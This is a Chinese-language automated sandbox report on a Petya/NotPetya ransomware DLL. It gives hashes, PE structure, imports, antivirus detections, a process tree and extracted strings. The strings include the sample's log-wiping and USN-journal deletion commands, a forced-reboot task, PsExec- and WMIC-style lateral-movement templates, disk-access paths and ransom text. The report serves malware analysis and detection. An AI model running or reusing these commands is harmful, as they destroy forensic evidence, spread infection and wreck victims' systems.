比较分析...

分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-hpdapp03-1 2017-06-28 14:37:23 2017-06-28 14:42:42 319 秒
  • 错误信息: Task #103405: The analysis hit the critical timeout, terminating.
    请联系 support@maldun.com 取得帮助!

魔盾分数

10.0

Petya病毒

文件详细信息

文件名 027cc450ef5f8c5f653329641ec1fed9.exe
文件大小 362360 字节
文件类型 PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 71b6a493388e7d0b40c83ce903bc6b04
SHA1 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA256 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
SHA512 072205eca5099d9269f358fe534b370ff21a4f12d7938d6d2e2713f69310f0698e53b8aff062849f0b2a521f68bee097c1840993825d2a5a3aa8cf4145911c6f
CRC32 673F086C
Ssdeep 6144:y/Bt80VmNTBo/x95ZjAetGDN3VFNq7pC+9OqFoK30b3ni5rdQY/CdUOs2:y/X4NTS/x9jNG+w+9OqFoK323qdQYKUG
Yara 登录查看Yara规则
样本下载 提交误报
登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

摘要

登录查看详细行为信息

PE 信息

初始地址 0x10000000
入口地址 0x10007d39
声明校验值 0x0005bb63
实际校验值 0x0005bb63
最低操作系统版本要求 5.1
编译时间 2017-06-18 15:14:36
载入哈希 52dd60b5f3c9e2f17c2e303e8c8d4eab

微软证书验证 (Sign Tool)

SHA1 时间戳 有效性 错误
1432e4ad0ed7355e37df2421cd1a8f3bb933923f Wed Apr 28 02:06:59 2010
WinVerifyTrust returned error 0x80096010
证书链 Certificate Chain 1
发行给 Microsoft Root Authority
发行人 Microsoft Root Authority
有效期 Thu Dec 31 150000 2020
SHA1 哈希 a43489159a520f0d93d032ccaf37e7fe20a8b419
证书链 Certificate Chain 2
发行给 Microsoft Code Signing PCA
发行人 Microsoft Root Authority
有效期 Sat Aug 25 150000 2012
SHA1 哈希 3036e3b25b88a55b86fc90e6e9eaad5081445166
证书链 Certificate Chain 3
发行给 Microsoft Corporation
发行人 Microsoft Code Signing PCA
有效期 Tue Mar 08 064029 2011
SHA1 哈希 9617094a1cfb59ae7c1f7dfdb6739e4e7c40508f
证书链 Timestamp Chain 1
发行给 Microsoft Root Authority
发行人 Microsoft Root Authority
有效期 Thu Dec 31 150000 2020
SHA1 哈希 a43489159a520f0d93d032ccaf37e7fe20a8b419
证书链 Timestamp Chain 2
发行给 Microsoft Timestamping PCA
发行人 Microsoft Root Authority
有效期 Sun Sep 15 150000 2019
SHA1 哈希 3ea99a60058275e0ed83b892a909449f8c33b245
证书链 Timestamp Chain 3
发行给 Microsoft Time-Stamp Service
发行人 Microsoft Timestamping PCA
有效期 Fri Jul 26 031115 2013
SHA1 哈希 4d6f357f0e6434da97b1afc540fb6fdd0e85a89f

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x0000bd63 0x0000be00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.55
.rdata 0x0000d000 0x00008546 0x00008600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.99
.data 0x00016000 0x00009b4a 0x00005200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.43
.rsrc 0x00020000 0x0003c738 0x0003c800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00
.reloc 0x0005d000 0x00000c02 0x00000e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 4.77

覆盖

偏移量 0x00057000
大小 0x00001778

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
RT_RCDATA 0x0005ba04 0x00000d33 LANG_ENGLISH SUBLANG_ENGLISH_US 7.95 data
RT_RCDATA 0x0005ba04 0x00000d33 LANG_ENGLISH SUBLANG_ENGLISH_US 7.95 data
RT_RCDATA 0x0005ba04 0x00000d33 LANG_ENGLISH SUBLANG_ENGLISH_US 7.95 data
RT_RCDATA 0x0005ba04 0x00000d33 LANG_ENGLISH SUBLANG_ENGLISH_US 7.95 data

导入

库: KERNEL32.dll:
0x1000d09c ConnectNamedPipe
0x1000d0a0 GetModuleHandleW
0x1000d0a4 CreateNamedPipeW
0x1000d0a8 TerminateThread
0x1000d0ac DisconnectNamedPipe
0x1000d0b0 FlushFileBuffers
0x1000d0b4 GetTempPathW
0x1000d0b8 GetProcAddress
0x1000d0bc DeleteFileW
0x1000d0c0 FreeLibrary
0x1000d0c4 GlobalAlloc
0x1000d0c8 LoadLibraryW
0x1000d0cc GetComputerNameExW
0x1000d0d0 GlobalFree
0x1000d0d4 ExitProcess
0x1000d0d8 GetVersionExW
0x1000d0dc GetModuleFileNameW
0x1000d0e4 ResumeThread
0x1000d0ec GetFileSize
0x1000d0f0 SetFilePointer
0x1000d0f4 SetLastError
0x1000d0f8 LoadResource
0x1000d0fc GetCurrentThread
0x1000d100 OpenProcess
0x1000d104 GetSystemDirectoryW
0x1000d108 SizeofResource
0x1000d10c GetLocalTime
0x1000d110 Process32FirstW
0x1000d114 LockResource
0x1000d118 Process32NextW
0x1000d11c GetModuleHandleA
0x1000d120 lstrcatW
0x1000d128 GetCurrentProcess
0x1000d12c VirtualFree
0x1000d130 VirtualAlloc
0x1000d134 LoadLibraryA
0x1000d138 VirtualProtect
0x1000d13c WideCharToMultiByte
0x1000d140 GetExitCodeProcess
0x1000d144 WaitForMultipleObjects
0x1000d148 CreateProcessW
0x1000d14c PeekNamedPipe
0x1000d150 GetTempFileNameW
0x1000d154 InterlockedExchange
0x1000d158 LeaveCriticalSection
0x1000d15c MultiByteToWideChar
0x1000d160 CreateFileA
0x1000d164 GetTickCount
0x1000d168 CreateThread
0x1000d16c LocalFree
0x1000d170 FindNextFileW
0x1000d174 CreateFileMappingW
0x1000d178 LocalAlloc
0x1000d17c FindClose
0x1000d180 GetFileSizeEx
0x1000d184 CreateFileW
0x1000d188 Sleep
0x1000d18c FlushViewOfFile
0x1000d190 GetLogicalDrives
0x1000d194 WaitForSingleObject
0x1000d198 GetDriveTypeW
0x1000d19c UnmapViewOfFile
0x1000d1a0 MapViewOfFile
0x1000d1a4 FindFirstFileW
0x1000d1a8 CloseHandle
0x1000d1ac DeviceIoControl
0x1000d1b0 GetLastError
0x1000d1b4 GetSystemDirectoryA
0x1000d1b8 ReadFile
0x1000d1bc WriteFile
0x1000d1c0 GetProcessHeap
0x1000d1c8 HeapReAlloc
0x1000d1cc GetWindowsDirectoryW
0x1000d1d0 EnterCriticalSection
0x1000d1d4 HeapFree
0x1000d1d8 SetFilePointerEx
0x1000d1dc HeapAlloc
0x1000d1e0 FindResourceW
库: USER32.dll:
0x1000d250 ExitWindowsEx
0x1000d254 wsprintfA
0x1000d258 wsprintfW
库: ADVAPI32.dll:
0x1000d000 CryptGenRandom
0x1000d004 CryptAcquireContextA
0x1000d008 CryptExportKey
0x1000d00c CryptAcquireContextW
0x1000d010 CreateProcessAsUserW
0x1000d018 DuplicateTokenEx
0x1000d01c SetTokenInformation
0x1000d020 GetTokenInformation
0x1000d028 OpenThreadToken
0x1000d02c GetSidSubAuthority
0x1000d030 AdjustTokenPrivileges
0x1000d034 LookupPrivilegeValueW
0x1000d038 OpenProcessToken
0x1000d03c SetThreadToken
0x1000d040 CredEnumerateW
0x1000d044 CredFree
0x1000d050 CryptDestroyKey
0x1000d054 CryptGenKey
0x1000d058 CryptEncrypt
0x1000d05c CryptImportKey
0x1000d060 CryptSetKeyParam
0x1000d064 CryptReleaseContext
库: SHELL32.dll:
0x1000d210 CommandLineToArgvW
0x1000d214 SHGetFolderPathW
库: ole32.dll:
0x1000d2b8 CoCreateGuid
0x1000d2bc CoTaskMemFree
0x1000d2c0 StringFromCLSID
库: CRYPT32.dll:
0x1000d06c CryptStringToBinaryW
0x1000d070 CryptBinaryToStringW
0x1000d074 CryptDecodeObjectEx
库: SHLWAPI.dll:
0x1000d21c PathAppendW
0x1000d220 StrToIntW
0x1000d224 PathFindFileNameW
0x1000d228 PathFileExistsW
0x1000d22c StrCmpW
0x1000d230 StrCmpIW
0x1000d234 StrChrW
0x1000d238 StrCatW
0x1000d23c StrStrW
0x1000d240 PathFindExtensionW
0x1000d244 PathCombineW
0x1000d248 StrStrIW
库: IPHLPAPI.DLL:
0x1000d090 GetIpNetTable
0x1000d094 GetAdaptersInfo
库: WS2_32.dll:
0x1000d260 inet_ntoa
0x1000d264 gethostbyname
0x1000d268 __WSAFDIsSet
0x1000d26c ntohl
0x1000d270 ioctlsocket
0x1000d274 connect
0x1000d278 inet_addr
0x1000d27c select
0x1000d280 recv
0x1000d284 send
0x1000d288 htons
0x1000d28c closesocket
0x1000d290 socket
0x1000d294 WSAStartup
库: MPR.dll:
0x1000d1e8 WNetOpenEnumW
0x1000d1ec WNetEnumResourceW
0x1000d1f0 WNetCancelConnection2W
0x1000d1f4 WNetAddConnection2W
0x1000d1f8 WNetCloseEnum
库: NETAPI32.dll:
0x1000d200 NetServerEnum
0x1000d204 NetApiBufferFree
0x1000d208 NetServerGetInfo
库: DHCPSAPI.DLL:
0x1000d07c DhcpEnumSubnetClients
0x1000d080 DhcpRpcFreeMemory
0x1000d084 DhcpGetSubnetInfo
0x1000d088 DhcpEnumSubnets
库: msvcrt.dll:
0x1000d29c malloc
0x1000d2a0 _itoa
0x1000d2a4 free
0x1000d2a8 memset
0x1000d2ac rand
0x1000d2b0 memcpy
.text
`.rdata
@.data
.rsrc
@.reloc
PVVhH
QSVWh
L$@Qj
VV@PVVh
PVVVVh
D$<PSSh
Fast decoding Code from Chris Anderson
invalid literal/length code
invalid distance code
invalid distance too far back
1.2.8
incorrect header check
unknown compression method
invalid window size
unknown header flags set
header crc mismatch
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid code lengths set
invalid bit length repeat
invalid code -- missing end-of-block
invalid literal/lengths set
invalid distances set
invalid literal/length code
invalid distance code
invalid distance too far back
incorrect data check
incorrect length check
need dictionary
stream end
file error
stream error
data error
insufficient memory
buffer error
incompatible version
inflate 1.2.8 Copyright 1995-2013 Mark Adler
\\.\PhysicalDrive
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
IsWow64Process
GetExtendedTcpTable
ntdll.dll
NtRaiseHardError
\\.\C:
\\.\PhysicalDrive0
255.255.255.255
%u.%u.%u.%u
CreateFileA
HeapAlloc
SetFilePointerEx
HeapFree
GetProcessHeap
WriteFile
ReadFile
GetSystemDirectoryA
GetLastError
DeviceIoControl
CloseHandle
FindFirstFileW
MapViewOfFile
UnmapViewOfFile
GetDriveTypeW
WaitForSingleObject
GetLogicalDrives
FlushViewOfFile
Sleep
CreateFileW
GetFileSizeEx
FindClose
LocalAlloc
CreateFileMappingW
FindNextFileW
LocalFree
CreateThread
GetTickCount
MultiByteToWideChar
LeaveCriticalSection
SetLastError
EnterCriticalSection
HeapReAlloc
InitializeCriticalSection
InterlockedExchange
GetTempFileNameW
PeekNamedPipe
CreateProcessW
GetCurrentProcess
ConnectNamedPipe
GetModuleHandleW
CreateNamedPipeW
TerminateThread
DisconnectNamedPipe
FlushFileBuffers
GetTempPathW
GetProcAddress
DeleteFileW
FreeLibrary
GlobalAlloc
LoadLibraryW
GetComputerNameExW
GlobalFree
ExitProcess
GetVersionExW
GetModuleFileNameW
DisableThreadLibraryCalls
ResumeThread
GetEnvironmentVariableW
GetFileSize
SetFilePointer
FindResourceW
LoadResource
GetCurrentThread
OpenProcess
GetSystemDirectoryW
SizeofResource
GetLocalTime
Process32FirstW
LockResource
Process32NextW
GetModuleHandleA
lstrcatW
CreateToolhelp32Snapshot
GetWindowsDirectoryW
VirtualFree
VirtualAlloc
LoadLibraryA
VirtualProtect
WideCharToMultiByte
GetExitCodeProcess
WaitForMultipleObjects
KERNEL32.dll
wsprintfW
ExitWindowsEx
wsprintfA
USER32.dll
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
CryptExportKey
CryptAcquireContextW
CryptSetKeyParam
CryptImportKey
CryptEncrypt
CryptGenKey
CryptDestroyKey
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
CredFree
CredEnumerateW
SetThreadToken
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
GetSidSubAuthority
OpenThreadToken
GetSidSubAuthorityCount
GetTokenInformation
SetTokenInformation
DuplicateTokenEx
InitiateSystemShutdownExW
CreateProcessAsUserW
ADVAPI32.dll
CommandLineToArgvW
SHGetFolderPathW
SHELL32.dll
StringFromCLSID
CoCreateGuid
CoTaskMemFree
ole32.dll
CryptDecodeObjectEx
CryptStringToBinaryW
CryptBinaryToStringW
CRYPT32.dll
PathFindExtensionW
StrStrIW
PathCombineW
StrStrW
StrCatW
StrChrW
StrToIntW
StrCmpIW
StrCmpW
PathFileExistsW
PathFindFileNameW
PathAppendW
SHLWAPI.dll
GetIpNetTable
GetAdaptersInfo
IPHLPAPI.DLL
WS2_32.dll
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
WNetCancelConnection2W
WNetAddConnection2W
MPR.dll
NetServerEnum
NetApiBufferFree
NetServerGetInfo
NETAPI32.dll
DhcpRpcFreeMemory
DhcpGetSubnetInfo
DhcpEnumSubnets
DhcpEnumSubnetClients
DHCPSAPI.DLL
msvcrt.dll
memcpy
malloc
_itoa
memset
perfc.dat
bHbGcDiHpY`
.text
`.rdata
@.data
@.rsrc
@.reloc
QSVh<
FindResourceW
LoadResource
CreateProcessW
HeapAlloc
HeapFree
GetProcessHeap
WriteFile
SizeofResource
CreateFileW
LockResource
CloseHandle
KERNEL32.dll
IsProcessorFeaturePresent
.text
`.rdata
@.data
.pdata
@.rsrc
CreateProcessW
CloseHandle
WriteFile
CreateFileW
HeapFree
HeapAlloc
GetProcessHeap
SizeofResource
LockResource
LoadResource
FindResourceW
KERNEL32.dll
rp>?C\@*BB@rp>3<?3<@\Crp<&R>?RB\C@r
sSsAsCsCsCsSsFs]sCsss
u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu
5mE'%%%
0123456789abcdef
CHKDSK is repairing sector
Please reboot your computer!
Decrypting sector
Key:
%)
4=@w|
2S1]-'e
^c_B~
hn vF
Vzs.i
%<PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
9"</<|</>
;4<8<<<@<D<H<L<
zw9gj
Send your Bitcoin wallet ID and personal installation key to e-mail
MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB
C:\Windows;
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.
Microsoft Enhanced RSA and AES Cryptographic Provider
README.TXT
"%ws:%ws"
kernel32.dll
\\.\pipe\%ws
"%ws" %ws
iphlpapi.dll
e%u.%u.%u.%u
TERMSRV/
127.0.0.1
localhost
SeTcbPrivilege
SeShutdownPrivilege
SeDebugPrivilege
C:\Windows\
/c %ws
ComSpec
\cmd.exe
wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
at %02d:%02d %ws
shutdown.exe /r /f
/RU "SYSTEM"
dllhost.dat
u%s \\%s -accepteula -s
-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
wbem\wmic.exe
%s /node:"%ws" /user:"%ws" /password:"%ws"
process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
\\%s\admin$
\\%ws\admin$\%ws
c:\Windows\
rundll32.exe
rundll32.exe
c:\Windows\
防病毒引擎/厂商 病毒名/规则匹配 病毒库日期
Bkav W32.RsPetyaND.Worm 20170628
MicroWorld-eScan Trojan.Ransom.GoldenEye.B 20170628
nProtect Ransom/W32.Petya.362360 20170628
CMC RansomWare.Win32.Petya!O 20170628
CAT-QuickHeal Ransom.Petya 20170627
McAfee RDN/Ransomware 20170628
Malwarebytes Ransom.Petya.EB 20170628
VIPRE Win32.Malware!Drop 20170628
SUPERAntiSpyware 未发现病毒 20170628
TheHacker 未发现病毒 20170628
K7GW Trojan ( 0001140e1 ) 20170628
K7AntiVirus Trojan ( 0001140e1 ) 20170627
Arcabit Trojan.Ransom.GoldenEye.B 20170628
Invincea 未发现病毒 20170607
Baidu 未发现病毒 20170628
Cyren W32/Petya.VUNZ-1981 20170628
Symantec Ransom.Petya 20170628
ESET-NOD32 Win32/Diskcoder.C 20170628
TrendMicro-HouseCall Ransom_PETYA.TH627 20170628
Paloalto generic.ml 20170628
ClamAV 未发现病毒 20170628
GData Win32.Trojan-Ransom.Petya.V 20170628
Kaspersky Trojan-Ransom.Win32.PetrWrap.d 20170627
BitDefender Trojan.Ransom.GoldenEye.B 20170628
NANO-Antivirus Trojan.Win32.Petya.eqlcgp 20170628
AegisLab 未发现病毒 20170628
Rising 未发现病毒 20170625
Ad-Aware Trojan.Ransom.GoldenEye.B 20170628
Emsisoft Trojan-Ransom.GoldenEye (A) 20170628
Comodo TrojWare.Win32.Ransom.Petya.BE 20170628
F-Secure Trojan:W32/Petya.F 20170628
DrWeb Trojan.Encoder.12544 20170628
Zillya 未发现病毒 20170623
TrendMicro Ransom_PETYA.TH627 20170628
McAfee-GW-Edition Ransom-Petya!71B6A493388E 20170628
Sophos Troj/Ransom-EOB 20170628
Ikarus Trojan-Ransom.Petrwrap 20170627
F-Prot W32/Petya.Ransom.J 20170628
Jiangmin Trojan.RansomPetya.a 20170628
Webroot W32.Ransomware.Petrwrap 20170628
Avira TR/Ransom.ME.12 20170628
Antiy-AVL Trojan[Ransom]/Win32.Petya 20170628
Kingsoft 未发现病毒 20170628
Endgame malicious (high confidence) 20170615
ViRobot Trojan.Win32.S.Petya.362360 20170628
ZoneAlarm Trojan-Ransom.Win32.PetrWrap.d 20170628
Microsoft Ransom:Win32/Petya 20170628
AhnLab-V3 未发现病毒 20170627
ALYac Trojan.Ransom.Petya 20170628
AVware Win32.Malware!Drop 20170628
VBA32 TrojanRansom.Filecoder 20170627
Panda Trj/CryptoPetya.B 20170626
Zoner 未发现病毒 20170628
Tencent Win32.Trojan.Ransomware.Skuo 20170628
Yandex 未发现病毒 20170627
SentinelOne 未发现病毒 20170516
Fortinet W32/Petya.EOB!tr 20170628
AVG Win64:Malware-gen 20170628
Avast Win64:Malware-gen 20170628
CrowdStrike malicious_confidence_100% (W) 20170420
Qihoo-360 Trojan.Generic 20170628

进程树

rundll32.exe, PID: 2568, 上一级进程 PID: 2428
cmd.exe, PID: 2664, 上一级进程 PID: 2568
736A.tmp, PID: 2760, 上一级进程 PID: 2568
schtasks.exe, PID: 2804, 上一级进程 PID: 2664
cmd.exe, PID: 2988, 上一级进程 PID: 2568
wevtutil.exe, PID: 3060, 上一级进程 PID: 2988
wevtutil.exe, PID: 1440, 上一级进程 PID: 2988
wevtutil.exe, PID: 1092, 上一级进程 PID: 2988
wevtutil.exe, PID: 696, 上一级进程 PID: 2988
fsutil.exe, PID: 1256, 上一级进程 PID: 2988
下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49189 192.168.122.1 80

UDP

无UDP连接纪录.

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49189 192.168.122.1 80

UDP

无UDP连接纪录.

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://192.168.122.1/ 
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: DavClnt
translate: f
Host: 192.168.122.1

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

源地址 目标地址 ICMP类型 数据
192.168.122.1 192.168.122.201 3
192.168.122.1 192.168.122.201 3
192.168.122.1 192.168.122.201 3

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
文件名 027cc450ef5f8c5f653329641ec1fed9.exe.dll
相关文件
C:\Users\test\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.exe.dll
文件大小 362360 字节
文件类型 data
MD5 9a7ffe65e0912f9379ba6e8e0b079fde
SHA1 532bea84179e2336caed26e31805ceaa7eec53dd
SHA256 4b336c3cc9b6c691fe581077e3dd9ea7df3bf48f79e35b05cf87e079ec8e0651
CRC32 1CC8A763
Ssdeep 3::
Yara
  • Rule to detect the no presence of any image
  • Rule to detect the no presence of any attachment
  • Rule to detect the no presence of any url
下载提交魔盾安全分析
文件名 736A.tmp
相关文件
C:\Users\test\AppData\Local\Temp\736A.tmp
文件大小 56320 字节
文件类型 data
MD5 bfd70118226e2e6391b6a0992f8b5b22
SHA1 4f9e3810d346b368b7c2437eb4bb040d3f6daed3
SHA256 f8d214080544676394eea8dda1cbd79db436414860e1809cccd56b2da039c724
CRC32 41ACE994
Ssdeep 3::
下载提交魔盾安全分析
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)		 下载

Processing ( 15.749 seconds )

  • 7.16 Suricata
  • 3.768 BehaviorAnalysis
  • 1.638 VirusTotal
  • 1.247 Dropped
  • 0.95 TargetInfo
  • 0.553 Static
  • 0.274 peid
  • 0.056 AnalysisInfo
  • 0.038 Debug
  • 0.035 NetworkAnalysis
  • 0.028 Strings
  • 0.002 Memory

Signatures ( 2.789 seconds )

  • 0.334 antiav_detectfile
  • 0.247 infostealer_bitcoin
  • 0.197 md_bad_drop
  • 0.184 ransomware_extensions
  • 0.158 mimics_filetime
  • 0.145 antivm_generic_disk
  • 0.145 stealth_timeout
  • 0.13 antivm_vbox_files
  • 0.122 infostealer_ftp
  • 0.111 virus
  • 0.11 ransomware_files
  • 0.108 stealth_file
  • 0.093 reads_self
  • 0.086 infostealer_im
  • 0.061 antidbg_devices
  • 0.052 infostealer_mail
  • 0.045 rat_pcclient
  • 0.04 hawkeye_behavior
  • 0.035 network_tor
  • 0.028 injection_createremotethread
  • 0.027 injection_explorer
  • 0.025 antivm_vmware_files
  • 0.021 betabot_behavior
  • 0.02 kazybot_behavior
  • 0.02 injection_runpe
  • 0.02 network_tor_service
  • 0.019 sniffer_winpcap
  • 0.018 antiav_detectreg
  • 0.016 kibex_behavior
  • 0.016 geodo_banking_trojan
  • 0.014 persistence_autorun
  • 0.013 targeted_flame
  • 0.012 antivm_vpc_files
  • 0.012 banker_cridex
  • 0.009 antianalysis_detectfile
  • 0.008 tinba_behavior
  • 0.008 antisandbox_sunbelt_files
  • 0.007 antiemu_wine_func
  • 0.007 shifu_behavior
  • 0.006 bitcoin_opencl
  • 0.006 spreading_autoruninf
  • 0.005 antivm_vbox_devices
  • 0.005 modifies_hostfile
  • 0.004 network_http
  • 0.004 persistence_ads
  • 0.003 antiav_avast_libs
  • 0.003 antianalysis_detectreg
  • 0.003 antisandbox_joe_anubis_files
  • 0.003 disables_browser_warn
  • 0.002 antivm_vbox_libs
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 antivm_vmware_devices
  • 0.002 browser_security
  • 0.001 bootkit
  • 0.001 antisandbox_sboxie_libs
  • 0.001 antiav_bitdefender_libs
  • 0.001 exec_crash
  • 0.001 vawtrak_behavior
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 modify_proxy
  • 0.001 disables_system_restore
  • 0.001 md_url_bl
  • 0.001 modify_security_center_warnings
  • 0.001 modify_uac_prompt
  • 0.001 network_cnc_http
  • 0.001 office_security

Reporting ( 1.02 seconds )

  • 0.536 ReportHTMLSummary
  • 0.484 Malheur
Task ID 103405
Mongo ID 59535002a093ef3c3f82289c
Cuckoo release 1.4-Maldun